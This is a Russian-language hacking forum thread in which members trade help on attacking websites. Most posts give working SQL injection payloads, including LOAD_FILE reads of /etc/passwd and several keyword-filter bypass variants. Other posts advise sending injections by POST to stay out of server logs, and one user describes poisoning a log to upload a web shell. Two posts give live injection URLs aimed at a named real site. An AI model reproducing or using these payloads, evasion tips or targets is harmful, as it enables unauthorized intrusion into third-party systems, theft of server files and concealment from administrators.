Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. zuzzz

    zuzzz Member

    Joined:
    3 Jul 2009
    Messages:
    38
    Likes Received:
    9
    Reputations:
    1
    mr.celt:

    1) спасиб, запомню
    2) лимит всегда ставлю, на всякий случай, чтобы по ошибке слишком много данных не получить
    он тут не помеха

    3) получилось вытащить файл /etc/hosts )
    а этот /etc/issue не сумел....
    значить права есть

    4) запросы post. Это что то меняет?
    и как долго данные в error.log и access.log хранятся?
     
  2. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    zuzzz

    Про POST-запросы. Может окажусь неточным, если что - поправьте. Если передавать запросы методом GET, то все отлично ложится в access.log данного сайта, включая всякие там UNION SELECT LOAD_FILES ... и т.д. При желании поиска методов взлома админ легким grep-ом найдет все запросы и поймет, где у него проблемы.
    А если передавать данные методом POST, то все параметры ложаться в тело запроса и при "стандартной" настройке apache в логи не попадают или становятся менее заметными.

    Про время хранения, это все индивидуально и зависит от настроек сервера. Я встречал сервера, где access.log и error.log заново начинались каждую неделю, а все остальные удалялись.
     
  3. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    при post в log будет запись вида
    ...bla.php
    а при get
    ...bla.php?id=123 where 1=2 union select LOAD_FILE(0x2f6574632f706173737764),2,3,4,5,6,7,8 limit 0,100#
    т.е. паливо, отлично видимое невооруженным взглядом :)

    как хранятся error.log и access.log зависит наверное и от настроке конкретного сервера/сайта, но те, что мне попадались - почти всегда, насколько помню, хранятся "вечно" - просто старые переносятся в архив. вопрос в том как часто туда заглядывает админ. на многих сайтах, такое впечатление, что вообще никогда :)
     
    1 person likes this.
  4. Анжелика

    Анжелика Elder - Старейшина

    Joined:
    25 Mar 2008
    Messages:
    25
    Likes Received:
    36
    Reputations:
    -4
    В случае наличия на сервере mod_security то и пост запросы будут в логах
     
  5. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Кто подскажет что делать если стоит фильтрация UNION или SELECT??
     
  6. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    +union+/*!select*/+0,1,2....
    +UniOn+SeLecT+0,1,2....
    +Union+Select+0,1,2....
    +/*!union*/+/*!select*/+0,1,2....
     
  7. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    если стоит mod_security то "обыкновенные" конструкции sql inj
    Code:
    ... union select ...
    вроде как работать не будут ?
     
  8. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Какие еще есть способы?
     
  9. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    942
    Likes Received:
    428
    Reputations:
    139
    ...+uniunionon+seleselectct...
    глупо так гадать, зависит от того, какой фильтр.
     
    1 person likes this.
  10. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Если фильтрация действует, когда union и select вместе, тогда используй подзапросы.
     
  11. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    410
    Likes Received:
    46
    Reputations:
    40
    union+%53%45%4C%45%43%54
     
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    еще мессаг~10 примерно, и мы таки придем к тому, что надо выложить сцыку и уже не страдать ерундой, мда. Придлагаю внести в правила
     
  13. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    476
    Likes Received:
    190
    Reputations:
    221
    отличное правило)))

    P.S. там ещё mod_rewrite может быть)
     
  14. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    Нет слов.

    Выкладывайте ссылку, а то гадать нету резона, да ещё и непонятно какая фильтрация, либо по типу preg_match, или по типу preg_replace.
     
  15. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    410
    Likes Received:
    46
    Reputations:
    40
    что не так?
     
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    2 pinch

    %53%45%4C%45%43%54=select ? :)
     
    _________________________
  17. trafbot

    trafbot New Member

    Joined:
    27 May 2010
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    Здравствуйте уважаемые форумчане.
    Есть небольшой вопросик.
    Можно ли использовать лог напрямую, а не черeз ../../../proc/self/fd/{0-9} ?
    Просто на одном сайте у меня кроме /etc/passwd ничего не открывалось, я начал искать лог напрямую, через конфиг апача /etc/httpd/config/httpd.conf нашел пути до файла логов, и вывел его напрямую. Нашел ошибку и попытался через юзерагент залить шел.
    Потом просто перестал открываться лог. Возможно я по неопытности запорол. Возможно system() было запрещено. Или же вся проблемы что с этим логом не получиться залить впринципе?
     
  18. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    410
    Likes Received:
    46
    Reputations:
    40
    да
     
  19. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    http://www.worstpreviews.com/review.php?id=-1+UniOn+all+SelEct+1,2,3,4,5,6,7,8,9,10,11,12--
     
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    можно и этот
    http://www.worstpreviews.com/review.php?id=-1+UNION SELECT version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--+
     
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.